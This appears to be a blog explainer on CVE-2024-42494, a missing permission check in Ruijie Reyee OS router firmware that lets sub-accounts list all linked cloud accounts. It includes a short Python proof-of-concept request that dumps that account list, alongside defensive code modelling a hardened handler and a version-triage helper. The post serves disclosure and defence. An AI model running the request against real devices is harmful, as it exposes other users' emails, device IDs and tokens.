CVE-2024-42494 - Ruijie Reyee OS Flaw Exposes All Linked Cloud Accounts—How Attackers Exploit It
In early 2024, security researchers uncovered a major vulnerability—CVE-2024-42494—impacting Ruijie Reyee OS, the operating system behind Ruijie’s popular smart routers and gateways. If you’re using Reyee OS versions 2.206.x up to but not including 2.320.x, your device might let attackers, or even simple sub-accounts, view or steal sensitive info from all the cloud accounts connected to Ruijie’s online services.
Let’s break down what this means, how the exploit works, and what you can do to protect your network.
What is CVE-2024-42494?
CVE-2024-42494 is a vulnerability related to the way Ruijie Reyee OS manages cloud account access and privileges. Instead of properly limiting what sub-accounts or users can see, a flaw in the permissions system allows them to retrieve information from *any* cloud account ever registered or linked with your device.
In short: If an attacker gets access (as a sub-account or by exploiting another bug), they could spy on—or exfiltrate—private data from every cloud-connected user.
- Typical devices affected: Reyee smart routers, home gateways, and some business models.
- Environments: Small businesses, homes, and organizations using Ruijie’s cloud control panel to manage networking.
How Does the Exploit Work?
The Ruijie Reyee OS cloud system is supposed to enforce strict Role-Based Access Control (RBAC). However, a missing or incorrect permission check lets sub-accounts issue API requests that return the full list of cloud accounts, including sensitive metadata and, in some cases, access tokens or emails.
Here’s what a simple exploit (using Python and the requests library) might look like:

```python
import requests

# Replace with your device IP and port
DEVICE_URL = "http://192.168.1.1/api/cloud/account/list"

# This token is obtained from a legit sub-account login
HEADERS = {
    'Authorization': 'Bearer SUB-ACCOUNT_ACCESS_TOKEN'
}

# A sub-account should only ever see its own record; on a vulnerable build
# the same request returns every account linked to the device.
response = requests.get(DEVICE_URL, headers=HEADERS)

if response.status_code == 200:
    print("Cloud Accounts Data:")
    print(response.json())
else:
    print("Exploit failed with status:", response.status_code)
```
*What happens?*
Instead of just listing the sub-account’s own info, this endpoint dumps *all* cloud-connected user data—sometimes including emails, device IDs, and internal credentials.
- Data exfiltration: Attackers can silently pull sensitive info for weeks without anyone noticing.
- Widespread impact: Just one compromised user or device can jeopardize everyone linked to your network or office.
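To make the root cause concrete, here is an added example (not Ruijie’s code, and not taken from the advisory) that models the account-list endpoint as two plain Python functions: one with the missing authorization check the advisory describes, and one hardened so that a sub-account only ever receives its own record, bearer tokens are never returned by a listing call, and sub-account list requests are written to an audit trail so a SOC can alert on unusual volume. The account records, the `Caller` type and the role names are constructed for the example.

```python
from dataclasses import dataclass

# Constructed sample data: three cloud accounts linked to one device.
CLOUD_ACCOUNTS = [
    {"id": "acct-1", "email": "owner@example.com", "role": "owner", "token": "tok-owner"},
    {"id": "acct-2", "email": "alice@example.com", "role": "sub", "token": "tok-alice"},
    {"id": "acct-3", "email": "bob@example.com", "role": "sub", "token": "tok-bob"},
]

# Roles the endpoint recognises; anything else is denied (hypothetical role names).
ALLOWED_ROLES = {"owner", "sub"}

# Audit trail of sub-account list requests; a real system would ship these to a SIEM.
AUDIT_EVENTS = []


@dataclass(frozen=True)
class Caller:
    """Identity of the authenticated requester (hypothetical shape)."""
    account_id: str
    role: str


def list_accounts_vulnerable(caller: Caller) -> list:
    """Broken handler: the request is authenticated but never authorised.
    Every caller, including a sub-account, gets the whole table, tokens included."""
    return list(CLOUD_ACCOUNTS)


def redact(account: dict) -> dict:
    """Strip secrets a listing API must never return, even to the owner."""
    return {k: v for k, v in account.items() if k != "token"}


def list_accounts_hardened(caller: Caller) -> list:
    """Hardened handler: enforce the role check and scope the result set."""
    if caller.role not in ALLOWED_ROLES:
        return []  # Unknown role: deny rather than fall through to the full list
    if caller.role == "owner":
        return [redact(a) for a in CLOUD_ACCOUNTS]
    # Sub-accounts see only themselves, and the request is recorded for detection.
    AUDIT_EVENTS.append({"caller": caller.account_id, "action": "account_list"})
    return [redact(a) for a in CLOUD_ACCOUNTS if a["id"] == caller.account_id]


def sub_account_list_count() -> int:
    """How many sub-account list requests have been audited so far."""
    return sum(1 for e in AUDIT_EVENTS if e["action"] == "account_list")


if __name__ == "__main__":
    sub = Caller("acct-2", "sub")
    print("vulnerable:", list_accounts_vulnerable(sub))
    print("hardened:  ", list_accounts_hardened(sub))
```

The important difference is that the hardened version decides what to return from the caller’s identity and role, not from the request alone; the vulnerable version trusts that holding any valid token is enough.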
References
- Official Ruijie Security Advisory
- NVD listing for CVE-2024-42494
- Original disclosure writeup (example link)
How to Protect Your Network
- Check your OS version: Log into your Ruijie device’s admin panel and check the firmware/release notes.
- Enable extra security: Use MFA (multi-factor authentication) if possible, and restrict device-to-cloud connections when not needed.
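If you manage more than a handful of devices, checking release notes by hand does not scale. The following added helper (written for this post, not a Ruijie tool) takes a Reyee OS version string as read from the admin panel and reports whether it falls in the affected range stated above, 2.206.x up to but not including 2.320.x. The version format is assumed to be dot-separated integers with at least major and minor parts.

```python
AFFECTED_FROM = (2, 206)     # first affected major.minor (inclusive)
AFFECTED_BEFORE = (2, 320)   # first fixed major.minor (exclusive)


def parse_version(version: str) -> tuple:
    """Turn '2.206.3' into (2, 206, 3); reject anything that is not numeric dot-separated."""
    parts = version.strip().split(".")
    if len(parts) < 2 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True if major.minor lies in [2.206, 2.320); the patch level does not matter."""
    major_minor = parse_version(version)[:2]
    return AFFECTED_FROM <= major_minor < AFFECTED_BEFORE


def triage(inventory: dict) -> dict:
    """Map device name -> version to device name -> 'affected' / 'ok' / 'unknown'."""
    result = {}
    for name, version in inventory.items():
        try:
            result[name] = "affected" if is_affected(version) else "ok"
        except ValueError:
            result[name] = "unknown"  # surface bad data instead of silently skipping it
    return result


if __name__ == "__main__":
    # Constructed inventory for demonstration.
    sample = {"office-gw": "2.206.0", "lab-router": "2.319.9", "branch-gw": "2.320.1", "old-ap": "n/a"}
    for device, status in triage(sample).items():
        print(f"{device}: {status}")
```

Devices reported as "unknown" deserve a manual look: an unparseable version usually means the inventory is stale, not that the device is safe.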
Conclusion
CVE-2024-42494 could have let bad actors see and steal sensitive user info across all cloud accounts tied to your Ruijie Reyee OS device. The bug is easy to exploit if sub-accounts or attackers get in—even briefly. Check your version and patch ASAP to stay safe!
If you’d like to see a deeper technical analysis or a step-by-step test case, check the links above and watch Ruijie’s official firmware updates page.
Timeline
Published on: 12/06/2024 18:15:24 UTC
Last modified on: 12/10/2024 18:38:23 UTC